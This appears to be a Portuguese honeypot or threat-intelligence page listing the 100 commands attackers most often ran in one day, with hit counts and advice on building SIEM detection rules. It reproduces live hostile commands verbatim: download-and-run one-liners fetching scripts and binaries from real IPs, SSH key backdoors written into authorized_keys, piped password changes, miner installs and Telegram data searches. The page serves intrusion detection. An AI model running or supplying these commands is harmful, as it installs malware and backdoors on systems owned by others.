Atualizado: fevereiro de 2026

Top 100 Comandos Maliciosos

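Os comandos mais executados por atacantes após obter acesso ao sistema. Útil para detecção de intrusões e resposta a incidentes. Algumas entradas da lista não são comandos propriamente ditos: há prompts de senha (p. ex. "Enter new UNIX password:"), cabeçalhos HTTP (p. ex. "Accept-Encoding: gzip"), fragmentos de script ("then", "fi") e linhas longas que aparecem truncadas.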

15.940 comandos em 24h
1.
$Enter new UNIX password:
455 IPs1265x
2.
$lockr -ia .ssh
534 IPs867x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
476 IPs717x
4.
$uname -a
457 IPs701x
5.
$cat /proc/cpuinfo | grep name | wc -l
462 IPs688x
6.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
462 IPs686x
7.
$uname -m
450 IPs676x
8.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
459 IPs674x
9.
$uname
450 IPs672x
10.
$crontab -l
446 IPs669x
11.
$whoami
449 IPs669x
12.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
452 IPs668x
13.
$cat /proc/cpuinfo | grep model | grep name | wc -l
437 IPs655x
14.
$top
439 IPs652x
15.
$lscpu | grep Model
429 IPs648x
16.
$w
438 IPs647x
17.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
439 IPs635x
18.
$which ls
435 IPs632x
19.
$ls -lh $(which ls)
408 IPs568x
20.
$uname -s -v -n -m 2 > /dev/null
109 IPs339x
21.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
101 IPs300x
22.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
38 IPs184x
23.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
131 IPs135x
24.
$uname -m 2 > /dev/null
38 IPs95x
25.
$/bin/./uname -s -v -n -r -m
16 IPs49x
26.
$uname -s -v -n -r -m
14 IPs30x
27.
$then
4 IPs11x
28.
$if [ [ ! -d ${HOME}/.ssh ] ]
4 IPs11x
29.
$nproc
4 IPs10x
30.
$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
2 IPs9x
31.
$pm path com.ufo.miner
4 IPs8x
32.
$echo SCANNER_TEST
7 IPs7x
33.
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -qO- http://139.59.119.89/ohshit.sh | sh; curl -s http://139.59.119.89/ohshit.sh | sh; wget http://139.59.119.89/ohshit.sh -O ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 139.59.119.89 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 139.59.119.89; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 139.59.119.89 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit2.sh
7 IPs7x
34.
$rm -rf /data/local/tmp/*
2 IPs6x
35.
$cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android
3 IPs5x
36.
$fi
2 IPs5x
37.
$cd /data/local/tmp 2>/dev/null||cd /tmp 2>/dev/null||cd /cache;rm -f kla.sh;(wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||busybox wget -qO kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||curl -sLo kla.sh http://45.148.120.23/bins/kla.sh 2>/dev/null||nc 45.148.120.23 3342 >kla.sh 2>/dev/null);[ -s kla.sh ]&&chmod +x kla.sh 2>/dev/null&&nohup sh kla.sh tbk >/dev/null 2>&1 &
2 IPs4x
38.
$Accept-Encoding: gzip
1 IPs4x
39.
$/ip cloud print
3 IPs4x
40.
$rm -f /data/local/tmp/ufo.apk
3 IPs4x
41.
$am start -n com.ufo.miner/com.example.test.MainActivity
2 IPs4x
42.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
4 IPs4x
43.
$ps | grep trinity
2 IPs4x
44.
$echo Hi | cat -n
4 IPs4x
45.
$/data/local/tmp/nohup /data/local/tmp/trinity
2 IPs3x
46.
$uname -s -m
3 IPs3x
47.
$chmod 0755 /data/local/tmp/nohup
2 IPs3x
48.
$chmod 0755 /data/local/tmp/trinity
2 IPs3x
49.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
2 IPs3x
50.
$locate D877F783D5D3EF8Cs
3 IPs3x
51.
$ifconfig
3 IPs3x
52.
$cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:34029/arm7 -O arm7; chmod 777 arm7; ./arm7; busybox curl http://130.12.180.20:34029/arm7 -o arm7; chmod 777 arm7; ./arm7
2 IPs2x
53.
$cd /data/local/tmp/; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; wget http://140.233.190.82/cat.sh; sh cat.sh; curl http://140.233.190.82/cat.sh; sh cat.sh; busybox wget http://140.233.190.82/cat.sh; sh cat.sh; busybox curl http://140.233.190.82/cat.sh; sh cat.sh
2 IPs2x
54.
$cd /data/local/tmp/; busybox wget http://130.12.180.124/rq0anbhkd976/assets/js/o5a0j5tug8?token=PeOtaCY5NmzmOSDVm0BX9UDM8lJijstK; chmod 777 o5a0j5tug8; ./o5a0j5tug8
1 IPs2x
55.
$system
1 IPs2x
56.
$cd /data/local/tmp && busybox wget http://130.12.180.20:36695/dlr.arm7 -O arm7 2>/dev/null || curl -s http://130.12.180.20:36695/dlr.arm7 -o arm7 2>/dev/null && chmod 777 arm7 2>/dev/null && ./arm7; chmod 777 dvrHelper;./dvrHelper route
1 IPs2x
57.
$wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/c.sh; sh c.sh; wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/download.sh; sh download.sh; busybox wget http://130.12.182.211:25196/download.sh; sh download.sh; busybox curl http://130.12.182.211:25196/download.sh; sh download.sh
2 IPs2x
58.
$Accept: */*
1 IPs2x
59.
$cat /proc/cpuinfo
2 IPs2x
60.
$shell
1 IPs2x
61.
$q
1 IPs2x
62.
$ps | grep xig
1 IPs2x
63.
$ps -ef | grep '[Mm]iner'
2 IPs2x
64.
$pm install /data/local/tmp/ufo.apk
1 IPs2x
65.
$ps aux | head -10
2 IPs2x
66.
$ps | grep '[Mm]iner'
2 IPs2x
67.
$Connection: keep-alive
1 IPs2x
68.
$echo -e "Hadoop\nhFRCroxssY1h\nhFRCroxssY1h"|passwd|bash
1 IPs2x
69.
$echo -e "P@ssw0rd\n4FIq50IPJb50\n4FIq50IPJb50"|passwd|bash
1 IPs2x
70.
$echo "P@ssw0rd\n4FIq50IPJb50\n4FIq50IPJb50\n"|passwd
1 IPs2x
71.
$echo "root:jL1LzwxX7JxA"|chpasswd|bash
2 IPs2x
72.
$Accept-Encoding: gzip, deflate
1 IPs2x
73.
$echo "123321\nRUpeh9tuqw3v\nRUpeh9tuqw3v\n"|passwd
1 IPs1x
74.
$echo "123321\nKN51pmeeHHUv\nKN51pmeeHHUv\n"|passwd
1 IPs1x
75.
$echo "123321\nDjHRSyQ1EPdO\nDjHRSyQ1EPdO\n"|passwd
1 IPs1x
76.
$echo "123321\n4SI1mMl74HlR\n4SI1mMl74HlR\n"|passwd
1 IPs1x
77.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "SP2NOvnB\nSP2NOvnB" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
78.
$echo "123123\nP1OUW6T29tS6\nP1OUW6T29tS6\n"|passwd
1 IPs1x
79.
$echo "123123123\nwFvHhFrIHxtg\nwFvHhFrIHxtg\n"|passwd
1 IPs1x
80.
$echo "123123123\nmXEz2gAp8d4V\nmXEz2gAp8d4V\n"|passwd
1 IPs1x
81.
$echo "123!@#$\nfZ1nfmnNzyUW\nfZ1nfmnNzyUW\n"|passwd
1 IPs1x
82.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "L435vfVF\nL435vfVF" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
83.
$echo "123!@#$\nEzP2gX7rk5b5\nEzP2gX7rk5b5\n"|passwd
1 IPs1x
84.
$echo "121212\nhUxxa3cXY2Mb\nhUxxa3cXY2Mb\n"|passwd
1 IPs1x
85.
$echo "121212\nfJsQEZM40Eca\nfJsQEZM40Eca\n"|passwd
1 IPs1x
86.
$echo "121212\n0MlnpYmDAiQb\n0MlnpYmDAiQb\n"|passwd
1 IPs1x
87.
$echo "111\nWyca6qXhOXbT\nWyca6qXhOXbT\n"|passwd
1 IPs1x
88.
$echo "123456\nvgHLHDPXKlOk\nvgHLHDPXKlOk\n"|passwd
1 IPs1x
89.
$echo "111\n3ynuIbVmzNZc\n3ynuIbVmzNZc\n"|passwd
1 IPs1x
90.
$echo "123456\noxtqEhEFdMOn\noxtqEhEFdMOn\n"|passwd
1 IPs1x
91.
$echo "123456\ngnmXRaT5TcSS\ngnmXRaT5TcSS\n"|passwd
1 IPs1x
92.
$echo "111111\nBlcbyJCuNf89\nBlcbyJCuNf89\n"|passwd
1 IPs1x
93.
$echo "111111\n89Oo92DtFfPG\n89Oo92DtFfPG\n"|passwd
1 IPs1x
94.
$cat /proc/mounts; /bin/busybox WYJYX
1 IPs1x
95.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "GhheRrmj\nGhheRrmj" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
96.
$echo "123456\nhNPj5SOwsnGE\nhNPj5SOwsnGE\n"|passwd
1 IPs1x
97.
$echo "123456\nfQRbK99JMwea\nfQRbK99JMwea\n"|passwd
1 IPs1x
98.
$echo "123456\nuD0td0mfcHbY\nuD0td0mfcHbY\n"|passwd
1 IPs1x
99.
$echo "123456\ndLTxtqoO7B3l\ndLTxtqoO7B3l\n"|passwd
1 IPs1x
100.
$echo "123456\nc14JQyxbxSnu\nc14JQyxbxSnu\n"|passwd
1 IPs1x

Reconhecimento

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistência

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Detecção

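Estes comandos podem ser usados para criar regras de detecção em SIEM, IDS/IPS e sistemas de monitoramento. Monitore estes padrões em seus logs para detectar intrusões. Comandos de reconhecimento como uname, whoami ou crontab -l também aparecem no uso administrativo legítimo e, isolados, geram muitos falsos positivos; prefira correlacionar a sequência de comandos em uma mesma sessão. Os padrões de maior sinal na lista são a remoção de atributos com chattr -ia seguida da regravação de .ssh/authorized_keys, a troca de senha por entrada canalizada para passwd/chpasswd e o download seguido de execução imediata a partir de /tmp ou /data/local/tmp. Os endereços IP, nomes de arquivo e chaves SSH listados são indicadores da janela de 24h observada e tendem a mudar; regras baseadas no comportamento duram mais do que regras baseadas nesses valores.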